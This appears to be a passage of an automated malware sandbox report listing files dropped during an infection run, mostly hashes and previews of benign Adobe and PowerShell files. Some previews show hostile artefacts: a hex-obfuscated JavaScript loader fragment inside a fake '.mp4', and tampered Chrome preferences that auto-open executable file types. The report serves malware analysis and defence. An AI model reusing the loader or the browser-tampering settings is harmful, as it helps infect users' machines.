SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.604

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	4
Entropy (8bit):	0.8112781244591328
Encrypted:	false
SSDEEP:	3:e:e
MD5:	DC84B0D741E5BEAE8070013ADDCC8C28
SHA1:	802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256:	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512:	65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious:	false
Preview:	....

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2145
Entropy (8bit):	5.072650518428207
Encrypted:	false
SSDEEP:	48:YoY0Oqc0aIJYnW2IKbI8CIgIdTciIp0INI90IzlIdKsaIZ:1OOhSFTeI95+Ksh
MD5:	72561067BE191A498F0BF641465F3EEC
SHA1:	3EE561301B5D3AE8009460B89CF6E43A0E9E26A3
SHA-256:	548C04F089B15CFDAEFDB3E52A35C88528F21494B9502772F6B89F8C09E1CCE9
SHA-512:	E0B983EC6E626B571E775B499B5A318E19CABEDDD6F65F9A64010C9277B45C093D6D7337C65FF4F79454DC91E18CC8FDE03D1547A434DF6FA1A819177399D1B0
Malicious:	false
Preview:	{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1734421111000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dd0f17db57e5734e373d1cdbdf192ce4","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696504100000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3167b843a2a5ade9e2e656a38eb13d42","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696504100000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"064db7ab127b8d12f389c27ca0b1e226","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696504095000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c7e4fd7bca43d109b99402cc03ec13b7","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696503445000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"9fbd47849261fc802c1ecaef20121b30","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696503445000},{"id":"DC_Reader_Edit_LHP_Banner"

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite 3.x database, last written using SQLite version 3040000, file counter 28, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 28
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.4576443604513811
Encrypted:	false
SSDEEP:	48:TFl2GL7msrhoGgpP5ZgrI2OtHLviuFuI7Phth:/VmsrhoGgt5Zg6p7J
MD5:	2823A9264DF17688DD16B373A2FBE84F
SHA1:	8F50E6CB3A0D109783CFED3A80C7E91F22192684
SHA-256:	79749108610BEDDD5C8E1559D7185823B9A3A373FDD09598D66D781FDB155D85
SHA-512:	6BC981BAD3BA2D663B0182731B50FC9A72B8F4AD9F79C01CF58FB6B2A6F3B931F5D1411D79733702496A8A254AE497DDF0924EFFE90C317753AF9A42CC8C4A8B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	SQLite Rollback Journal
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	1.9622636291517865
Encrypted:	false
SSDEEP:	48:7MkqhoGgpP5ZgrI2OtoLviuFuI7PehpRqVl2GL7msin:7RqhoGgt5Zg/p72hpRaVmsi
MD5:	4DC5F4975F6E1D8D18A648713ACC0512
SHA1:	738B2C148D32A8811133435EF15B6C1C4537A526
SHA-256:	F57534D0F987A334C09668F85727B44149C81B485F2CE742CE5D2B1C8EDDE62F
SHA-512:	A387B88D29B3C16DC1FE1D08583E2FA6CB6C4FE68A171104FDA0C814FE96A79BAF9FF50CC9EE13456025C8944BFF1D4A3EA4D478D295162C8D9B6D96CF96B87A
Malicious:	false
Preview:	.... .c.....J ............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	66726
Entropy (8bit):	5.392739213842091
Encrypted:	false
SSDEEP:	768:RNOpblrU6TBH44ADKZEg1DKsvntxwEcQ4VrVwwjouWxAmecYyu:6a6TZ44ADE1DvvHw1QCwSmrK
MD5:	6BCD865B248D42CB31A1ECC7443CED9B
SHA1:	97B56E1FCA77C21D435500E9EFD5B14E234B9A64
SHA-256:	D17539D3FE41670753E4C41EFEE45919A42CB747C04C6E99F849577CE58FF092
SHA-512:	261C79158627A094D97DB12D29FDA3BAF559D74020693A7777CD4B1C90EB1771645A2DC9CFD1262AB883F4A24FBE6CD6896BC1994CC63B639555F05D55A2DCDD
Malicious:	false
Preview:	4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	15122
Entropy (8bit):	5.544884023702201
Encrypted:	false
SSDEEP:	384:lx5CXEe1kXqKf/pUZNCgVLH2Hfae/rUoXHGVknYb8kq3H:lbQEe1kXqKf/pUZNCgVLH2HfJ/rUo3GY
MD5:	905A9E30D7459A98F03EF96747ED9F2D
SHA1:	67AC3B6B5A2A9BA0A74FC81F66594386FA40A9AB
SHA-256:	292A748C5F8574E2A3663396D053CF8A2C4A1DA9B388CF2D86B1A224955778E9
SHA-512:	089973B1C507A8957BBA1799AB3281F63F2AC93D2CB88D88ECF48363AAF6D202C85A8DEDC6377F03B69C2B2BF9418C9D19A243A014432838961B6A6746344F34
Malicious:	true
Preview:	{"download":{"directory_upgrade":true,"always_open_pdf_externally":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13340977054757257","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13340977054757257","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, e

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
MD5:	812F0A8C671812AA613FC139B69E8614
SHA1:	B4177437C50B25B06FB885362DA36FD171A1C5A9
SHA-256:	6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
SHA-512:	6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\3VKKE[1].mp4

Download File

Process:	C:\Windows\System32\mshta.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	352584
Entropy (8bit):	3.1578205932269725
Encrypted:	false
SSDEEP:	3072:bnOFF1Dk8UYUkbho0mMI2GBghe6XKKxe14ieMqQv7M4Er7:T4Pd1I6Xuc
MD5:	61EFF840778583E9969AFEDA5BA02EF0
SHA1:	70E373F124CD36FC074F5602777A97C843B1D280
SHA-256:	59864B210AC0B35641FFE142F436DC7F8B43D5A7224231B2AD3F3DE00F885409
SHA-512:	32F26B4AA866CB8354B4142B5A49F2CEF0C38020052C5CE8E4A429F3305777F72CDF748015F5B2E4F273D84D94E01B2D8B42BC16D4813DD25A5EA395628F034B
Malicious:	false
Preview:	66q75b6eb63i74b69c6fx6eS20z4aw53Y58N78T49P78t28F52t5aW73D70b29K7bp76L61x72C20y57J73t62x56m3dq20U27r27G3bh66W6fh72P20u28Q76e61D72x20t78S71y72B4cC55f20n3dw20U30G3bq78A71A72Q4cd55f20c3cT20E52V5aN73G70E2eW6cM65i6eX67Y74e68c3bn20x78H71s72R4cf55E2bx2bH29N7bJ76p61W72N20A72G4bg52F4cE20j3dS20w53Z74i72k69m6eO67b2eo66T72I6fO6dS43r68T61t72s43I6fy64y65a28f52M5ar73L70X5bj78q71V72G4cC55R5dT20u2dK20r32X33Z34I29e3bR57c73I62n56E20v3dX20e57u73G62N56X20H2bG20I72m4bk52i4cX7dM72D65X74G75i72R6er20v57Y73h62b56W7dT3bA76T61g72y20W57Z73m62Q56z20F3dw20O4at53e58K78N49l78X28G5bo33C34v36b2ct33W34a35V2cN33z35z33w2cS33k33t35X2cn33Z34K38Q2cL33v34G39M2cx33a33r38o2cn33h33h35m2cK33V34h32R2cE33s34n32b2cv32D38Z30Q2cA33J33d35e2cz33H35W34n2ca33G33u35t2cv32j36e36T2cf32l37i39f2cR33M35l33x2cC32b36S36v2cm32j38V33H2cW32q36M36o2cw32M37p39f2cK33u33M35E2ca33o34W36V2cN32T36w36J2cV33t31y39n2cX33g34b34X2cp33b34B38q2cl33n33X35E2cW33p34W39S2cw33D35V30X2cA33h34W38O2cF33w33h39S2cn33L33m33c2cs33Y35R30P2ck33R33q35j2cs33V33S34n2cQ32R36y36Y2cx3

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11608
Entropy (8bit):	4.890472898059848
Encrypted:	false
SSDEEP:	192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
MD5:	8A4B02D8A977CB929C05D4BC2942C5A9
SHA1:	F9A6426CAF2E8C64202E86B07F1A461056626BEA
SHA-256:	624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
SHA-512:	38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
Malicious:	false
Preview:	PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\71532689\XPoaTdYD.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	963397
Entropy (8bit):	6.793850672344393
Encrypted:	false
SSDEEP:	12288:Y3UgFC7mbSkjvbmxqn5A45dZ4aqzHlo0+gXLG7VX:Yrb/j5LdZ4aqDLXLG7VX
MD5:	70B1893C0680EE6389533300335B7DC3
SHA1:	20A13733A25D32547D27A963BDB6E8007532774D
SHA-256:	AA2734107B103077A121FDD37EBFD4E8A36E17E00EBF01746A7DB8D4EAA296EB
SHA-512:	355D7FB4095D6F408281900BFB89C1DED05A72591A7AB8162543039667A9CD7810B5FB62F9DDD0F547007A331ABE9F7597EC3DB8DC88BB3B4296B92D57BB8F07
Malicious:	false
Preview:	L5e...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................L5e.....................................

C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Joe Sandbox View:	Filename: payload_1.hta, Detection: malicious, Browse Filename: fsg5PWtTm2.lnk, Detection: malicious, Browse Filename: Whatsapp-GUI.exe, Detection: malicious, Browse Filename: Whatsapp-GUI.exe, Detection: malicious, Browse Filename: Agreement for Cooperation.PDF.lnk.download.lnk, Detection: malicious, Browse Filename: malware.zip, Detection: malicious, Browse Filename: Dark_drop_2_pers_lum_clean.exe.bin.exe, Detection: malicious, Browse Filename: Agreement for YouTube cooperation.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: 3rd_cc_form_Oct_2024.pdf.lnk.download.lnk, Detection: malicious, Browse Filename: tQ6Z4Vjp5f.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSI6585e.LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	246
Entropy (8bit):	3.5162684137903053
Encrypted:	false
SSDEEP:	6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8AYlnNWlI:Qw946cPbiOxDlbYnuRKO/iI
MD5:	4C15036B5D7F08C63522D43837A43B43
SHA1:	8085CAE541CC77B7A9C307A2BB0F8A19844D8A29
SHA-256:	0A7F6B92B3CA6DE4265D122A9BC014822463F2FEF9299C592AC1C21677E08733
SHA-512:	2DE06BE764DDF47F00AE126A1BBB909F22ED50CF533988A197126FA0822111C62DA517CD4797503EFC1BC0D58C66221BC58AD56E59C4B2026297800A0871C831
Malicious:	false
Preview:	..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.7./.1.2./.2.0.2.4. . .0.2.:.3.8.:.3.7. .=.=.=.....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25mpt5jp.cdo.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akidbmh4.ptd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0hfd1m1.asv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f1uvy4di.vin.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ms0b50fu.ymj.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxxhekdw.sda.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
